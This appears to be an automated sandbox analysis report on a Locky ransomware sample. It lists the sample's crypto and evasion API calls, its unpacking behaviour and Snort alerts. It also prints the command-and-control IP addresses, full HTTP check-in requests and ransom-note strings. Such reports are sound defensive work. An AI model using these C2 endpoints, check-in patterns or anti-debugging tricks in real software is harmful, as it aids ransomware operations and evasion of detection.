Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00405F08 SetUnhandledExceptionFilter,	0_2_00405F08

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0041973D SetSecurityDescriptorDacl,

0_2_0041973D

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_004197BD AllocateAndInitializeSid,

0_2_004197BD

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: GetLocaleInfoA,GetUserDefaultUILanguage,

0_2_0042E700

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_00406718 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00406718

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_00423053 GetVersionExA,

0_2_00423053

Source: C:\Users\user\Desktop\LockyRansom.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.17.44.153	unknown	Russian Federation	51659	ASBAXETRU	true
46.183.165.45	unknown	Russian Federation	197695	AS-REGRU	true
37.143.9.154	unknown	Russian Federation	203226	IHCRUInternet-HostingLtdMoscowRussiaRU	true
185.179.190.31	unknown	Russian Federation	44094	WEBHOST1-ASRU	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://46.17.44.153/imageload.cgi	true	Avira URL Cloud: safe	unknown
http://37.143.9.154/imageload.cgi	true	Avira URL Cloud: safe	unknown
http://46.183.165.45/imageload.cgi	true	Avira URL Cloud: safe	unknown
http://185.179.190.31/imageload.cgi	true	Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LockyRansom.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: LockyRansom.exe

ReversingLabs: Detection: 95%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: LockyRansom.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00415310 GetLastError,__CxxThrowException@8,CryptAcquireContextA,	0_2_00415310
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,	0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00416170 CryptReleaseContext,CryptDestroyKey,	0_2_00416170
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004193D8 CryptReleaseContext,	0_2_004193D8
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,	0_2_0041544C
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F8D0 CryptReleaseContext,	0_2_0040F8D0
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F890 CryptReleaseContext,	0_2_0040F890
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F8B8 CryptReleaseContext,	0_2_0040F8B8
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040F980 CryptGenRandom,__CxxThrowException@8,GetLastError,	0_2_0040F980
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040FB50 CryptDestroyKey,	0_2_0040FB50
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040FB10 CryptDestroyKey,	0_2_0040FB10
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040FBF0 __CxxThrowException@8,CryptEncrypt,GetLastError,	0_2_0040FBF0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LockyRansom.exe

Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack

Uses 32bit PE files

Source: LockyRansom.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:

Binary string: gefas.pdb source: LockyRansom.exe

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0042D5D0 FindClose,FindFirstFileW,

0_2_0042D5D0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic	Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49711 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49711 -> 46.17.44.153:80
Source: Traffic	Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49711 -> 46.17.44.153:80

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: ASBAXETRU ASBAXETRU
Source: Joe Sandbox View	ASN Name: AS-REGRU AS-REGRU
Source: Joe Sandbox View	ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU IHCRUInternet-HostingLtdMoscowRussiaRU
Source: Joe Sandbox View	ASN Name: WEBHOST1-ASRU WEBHOST1-ASRU

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://46.183.165.45/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.183.165.45Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://185.179.190.31/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.179.190.31Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://37.143.9.154/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 37.143.9.154Content-Length: 613Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imageload.cgi HTTP/1.1Accept: /Accept-Language: en-usReferer: http://46.17.44.153/x-requested-with: XMLHttpRequestContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 46.17.44.153Content-Length: 613Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 46.183.165.45
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 185.179.190.31
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 37.143.9.154
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153
Source: unknown	TCP traffic detected without corresponding DNS query: 46.17.44.153

Source: unknown

Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.179.190.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.179.190.31/imageload.cgin
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.179.190.31/imageload.cgir
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imag=
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgiC
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgid
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgilh
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://37.143.9.154/imageload.cgiy
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgi0
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgi0.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiL
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiV
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgik
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.153/imageload.cgiy3
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.17.44.1531oad.cgi%880
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.183.165.45/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.183.165.45/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.183.165.45/imageload.cgia-deddda976288
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/download/download-easy.html

Spam, unwanted Advertisements and Ransom Demands

Found potential ransomware demand text

Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory : All of your files are encrypted with RSA-2048 and AES-128 ciphers.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory : Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory : To receive your private key follow one of the links:

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,		0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey,		0_2_0041544C

Detected potential crypto function

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004022D0	0_2_004022D0
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040A58C	0_2_0040A58C
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004029C0	0_2_004029C0
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040B2C4	0_2_0040B2C4
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040940E	0_2_0040940E
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0040995F	0_2_0040995F
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00409EB0	0_2_00409EB0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: String function: 004182C0 appears 33 times
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: String function: 004761A0 appears 36 times

Uses 32bit PE files

Source: LockyRansom.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal96.rans.evad.winEXE@1/0@0/4

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0040CC4E CoCreateInstance,

0_2_0040CC4E

Source: C:\Users\user\Desktop\LockyRansom.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: LockyRansom.exe

ReversingLabs: Detection: 95%

Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: mciwave.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: gfiwave.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Section loaded: winnsi.dll	Jump to behavior

Source: C:\Users\user\Desktop\LockyRansom.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: LockyRansom.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: gefas.pdb source: LockyRansom.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\LockyRansom.exe

Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack .text:ER;.rdata:EW;.dec:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;.cdata:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LockyRansom.exe

Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004079B0

PE file contains sections with non-standard names

Source: LockyRansom.exe

Static PE information: section name: .dec

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00404705 push ecx; ret	0_2_00404718
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_004029AB push ecx; ret	0_2_004029BB
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00401408 push eax; ret	0_2_00401426

Source: LockyRansom.exe

Static PE information: section name: .rdata entropy: 7.910838175775477

Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LockyRansom.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\LockyRansom.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0040C58C rdtsc

0_2_0040C58C

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\Desktop\LockyRansom.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\LockyRansom.exe

API coverage: 7.7 %

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0042D5D0 FindClose,FindFirstFileW,

0_2_0042D5D0

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\LockyRansom.exe

API call chain: ExitProcess graph end node

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0040C58C rdtsc

0_2_0040C58C

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00405393

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004079B0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_005C007E push dword ptr fs:[00000030h]	0_2_005C007E
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_005C03EE push dword ptr fs:[00000030h]	0_2_005C03EE
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_0069007E push dword ptr fs:[00000030h]	0_2_0069007E
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_006903EE push dword ptr fs:[00000030h]	0_2_006903EE

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00405393
Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00403A6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00403A6C
